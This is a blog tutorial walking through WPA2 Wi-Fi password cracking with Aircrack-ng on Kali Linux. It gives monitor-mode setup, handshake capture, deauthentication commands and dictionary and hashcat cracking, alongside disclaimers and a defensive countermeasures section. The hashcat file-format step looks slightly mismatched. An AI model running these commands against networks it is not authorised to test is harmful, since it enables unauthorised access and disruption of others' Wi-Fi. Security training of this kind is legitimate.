Welcome to Notes Time πŸ‘‹

Notes Time is your trusted platform for free study notes, tutorials, and guides designed to make learning simple, clear, and effective.

Whether you’re exploring Full Stack Web Development, mastering Cyber Security, or diving into Digital Marketing β€” we’ve got you covered with easy-to-understand content and practical examples.

Learn smarter, grow faster, and upskill with Notes Time β€” your digital study companion for tech and career success.

Subscribe to our newsletter and get our newest updates right on your inbox.

WPA2 Password Cracking with Aircrack-ng - Complete Ethical Lab Guide

By Saurav Saini Β· 10 Feb 2026

WPA2 Password Cracking with Aircrack-ng - Complete Ethical Lab Guide

πŸ”“ Step-by-Step: WPA2 Password Cracking with Aircrack-ng (Ethical Lab)

⚠️ LEGAL & ETHICAL DISCLAIMER
This guide is for EDUCATIONAL PURPOSES ONLY in authorized lab environments.
Never test networks you don't own or have explicit written permission to test.
Unauthorized access to computer systems is illegal and punishable by law.

βœ… Prerequisites Before Starting

  • βœ” Kali Linux installed or Live USB
  • βœ” WiFi Adapter supporting monitor mode
  • βœ” Test/Lab network (your own)
  • βœ” Wordlists (rockyou.txt, custom dictionaries)
  • βœ” Written authorization if testing others' networks
πŸ“‹ Recommended WiFi Adapters
  • Alfa AWUS036NHA/NH (Best)
  • TP-Link TL-WN722N v1
  • Panda PAU09
  • Raspberry Pi WiFi
πŸ’Ύ Essential Wordlists
  • rockyou.txt (Kali default)
  • crunch (for generating)
  • crackstation.txt
  • Custom wordlists
⚠️ USB drives used for Kali Linux will be completely erased. Backup important data first!

⬇️ How to Download Kali Linux ISO

Kali Linux is the preferred distribution for penetration testing and wireless security assessments. It comes pre-installed with Aircrack-ng and other essential security tools.

πŸ’‘ Kali Linux is FREE and open-source, specifically designed for security testing with all tools configured and ready to use.

πŸ…ΎοΈ Option 1: Download via Official Kali Website

  • Visit Official Kali Linux Downloads:
    https://www.kali.org/get-kali/
  • Select Kali Linux 64-Bit (Installer)
  • Choose your preferred download method:
  • β€’ Direct HTTP download
  • β€’ Torrent (faster for large files)
  • β€’ Network installer (minimal download)
πŸ’‘ The installer ISO is recommended for beginners. It provides graphical installation.

πŸ…ΎοΈ Option 2: Download Specific Versions

⚑ Live USB version is perfect for testing without installation. Virtual Machine images work with VMware/VirtualBox.

πŸ” Verify ISO Integrity

⚠️ Security First:
Always download from official sources. Avoid third-party websites that may distribute modified or malicious ISOs.

πŸ’Ώ Creating Kali Linux Bootable USB with Rufus

Rufus is a free, open-source tool for creating bootable USB drives. It's fast, reliable, and works perfectly with Kali Linux.

πŸ”Ή Step 1: Download & Install Rufus

  • Visit Rufus Official Website:
    https://rufus.ie/
  • Download latest version (Portable recommended)
  • Insert USB drive (8GB+ recommended)
  • Run Rufus (no installation needed)
πŸ’‘ Rufus portable version doesn't require installation. Just run the executable.

πŸ”Ή Step 2: Configure Rufus Settings

Setting Value Notes
Device Your USB drive Double-check to avoid formatting wrong drive
Boot selection SELECT β†’ Choose Kali ISO Browse to downloaded Kali Linux ISO
Partition scheme MBR For BIOS/Legacy systems
Target system BIOS or UEFI-CSM MBR + BIOS for compatibility
File system FAT32 (Default) Recommended for bootable USB
⚠️ Data Loss Warning: USB drive will be completely erased. Backup any important files before proceeding.

πŸ”Ή Step 3: Create Bootable USB

  • Click START button
  • Warning appears β†’ Click OK
  • Select Write in ISO Image mode (Recommended)
  • Click OK
  • Wait for completion (5-15 minutes)
  • Status shows READY when done
  • Click CLOSE
  • Safely eject USB drive
βœ… Success: Your Kali Linux bootable USB is ready!

⚑ Booting Kali Linux from USB

Each computer manufacturer uses different keys to access boot menu. You need to select your USB drive as boot device.

πŸ”Ή Step 1: Access Boot Menu

Brand Boot Menu Key Alternative Keys
HP F9 or ESC F10 for BIOS
Dell F12 F2 for BIOS
Lenovo F12 or F1 Some have Novo button
Acer F12 F2 or Del
Asus F8 F2 or Del
MSI F11 Del for BIOS
πŸ’‘ Press the key repeatedly immediately after powering on the computer.

πŸ”Ή Step 2: Select Boot Device

  • Turn off computer completely
  • Insert Kali Linux USB drive
  • Turn on computer
  • Immediately press boot menu key
  • Select USB HDD: [Your USB Brand]
  • Press Enter

πŸ”Ή Step 3: Kali Linux Boot Menu

  • Select Live system (amd64)
  • Or Live system (persistent)
  • Kali Linux loads to desktop
  • Default credentials: kali/kali
βœ… Ready: Kali Linux is now running. Connect your WiFi adapter.

πŸ”§ Setting Up Aircrack-ng & WiFi Adapter

πŸ”Ή Step 1: Check WiFi Adapter

# Check wireless interfaces
iwconfig

# List available interfaces
sudo airmon-ng

# Detailed hardware info
sudo lshw -C network
πŸ’‘ If adapter shows "no wireless extensions", it may not support monitor mode.

πŸ”Ή Step 2: Put Adapter in Monitor Mode

# Stop interfering processes
sudo airmon-ng check kill

# Start monitor mode (wlan0 is example)
sudo airmon-ng start wlan0

# Verify monitor mode
sudo iwconfig
⚠️ After starting monitor mode, interface name changes (e.g., wlan0 β†’ wlan0mon)

🎯 Capturing WPA2 Handshake

πŸ”Ή Step 1: Scan for Networks

# Scan all networks
sudo airodump-ng wlan0mon

# Scan specific channel
sudo airodump-ng -c 6 wlan0mon

# Scan 2.4GHz band only
sudo airodump-ng --band bg wlan0mon

πŸ”Ή Step 2: Understand Airodump Output

Column Description Important For
BSSID Access Point MAC address Target identification
PWR Signal strength Better signal = easier capture
#Data Data packets Activity level
CH Channel number Target channel
ENC Encryption type WPA2 for this guide
ESSID Network name Target SSID

πŸ”Ή Step 3: Targeted Capture

# Replace with your target values
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

# Parameters explained:
# -c 6          : Channel number
# --bssid XX:XX : Target AP MAC address  
# -w capture    : Save to files starting with "capture"
# wlan0mon      : Monitor mode interface
πŸ’‘ Look for "WPA handshake" message in top-right corner when captured.

πŸ”Ή Step 4: Force Handshake (If Needed)

# Open new terminal
# Deauthenticate specific client
sudo aireplay-ng -0 4 -a [BSSID] -c [CLIENT_MAC] wlan0mon

# Broadcast deauth (all clients)
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon
🚨 Use deauthentication ONLY on your own test networks. Disrupting others' WiFi is unethical and often illegal.

πŸ”“ Cracking with Aircrack-ng

πŸ”Ή Step 1: Verify Handshake Capture

# Check if handshake is captured
sudo aircrack-ng capture-01.cap

# Alternative verification
sudo pyrit -r capture-01.cap analyze

πŸ”Ή Step 2: Dictionary Attack (Basic)

# Using rockyou.txt (Kali default)
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap

# Specify exact handshake file
sudo aircrack-ng -w /path/to/wordlist.txt capture-01.cap

πŸ”Ή Step 3: Optimized Attacks

# Combine multiple wordlists
cat wordlist1.txt wordlist2.txt > combined.txt
sudo aircrack-ng -w combined.txt capture-01.cap

# Using crunch for numeric passwords
crunch 8 8 0123456789 -o numlist.txt
sudo aircrack-ng -w numlist.txt capture-01.cap

πŸ”Ή Step 4: GPU Acceleration (Advanced)

# Convert to hashcat format
aircrack-ng capture-01.cap -J output_hash

# Crack with hashcat (GPU)
hashcat -m 22000 output_hash.hccapx rockyou.txt

# Benchmark your system
hashcat -b -m 22000
πŸ’‘ GPU cracking is 10-100x faster than CPU. Requires compatible NVIDIA/AMD GPU.

πŸ›‘οΈ Defensive Countermeasures

βœ… Strong Password Practices
  • Minimum 12 characters
  • Mix uppercase, lowercase, numbers, symbols
  • Avoid dictionary words
  • Use passphrases
  • Example: Tr0ub4dor&3agle$
πŸ”§ WiFi Security Settings
  • Use WPA3 when available
  • Disable WPS (Wi-Fi Protected Setup)
  • Hide SSID (limited effectiveness)
  • MAC address filtering
  • Enterprise WPA2/3

πŸ•΅οΈ Detection & Monitoring

# Monitor for deauth attacks
sudo airodump-ng --output-format csv -w monitoring wlan0

# Use WIDS tools
sudo kismet
sudo wireshark

πŸ”§ Common Issues & Solutions

Problem Possible Cause Solution
Adapter won't go to monitor mode Driver issues, incompatible hardware Try different adapter, check driver support
No networks detected Wrong band, driver problem Check iw list, try 2.4GHz band
Handshake not captured No clients connected, weak signal Use deauth attack, move closer to AP
Password not cracking Weak wordlist, complex password Use better wordlists, try rule-based attacks
Slow cracking speed CPU only, large wordlist Use GPU, optimize wordlist, use hashcat

βš–οΈ Ethical & Legal Guidelines

🚫 CRITICAL WARNING: UNAUTHORIZED ACCESS IS ILLEGAL

Violating computer fraud laws can result in fines and imprisonment.

βœ… Legal & Ethical Uses
  • Your own networks
  • Authorized testing with written permission
  • Educational labs
  • Corporate security testing
  • CTF competitions
❌ Illegal & Unethical Uses
  • Neighbor's WiFi without permission
  • Public hotspots without authorization
  • Corporate networks without clearance
  • Academic networks without approval
  • Any network you don't own
πŸ“„ Required Documentation
  • Written authorization from network owner
  • Scope of work document
  • Non-disclosure agreement
  • Liability waiver
  • Testing schedule
πŸ” Ethical Hacker's Pledge: "With great power comes great responsibility. I will use my skills only for protection, never for unauthorized access or harm."

πŸ“š

πŸ“š Related Blogs

🚫 No related blogs available at the moment.

+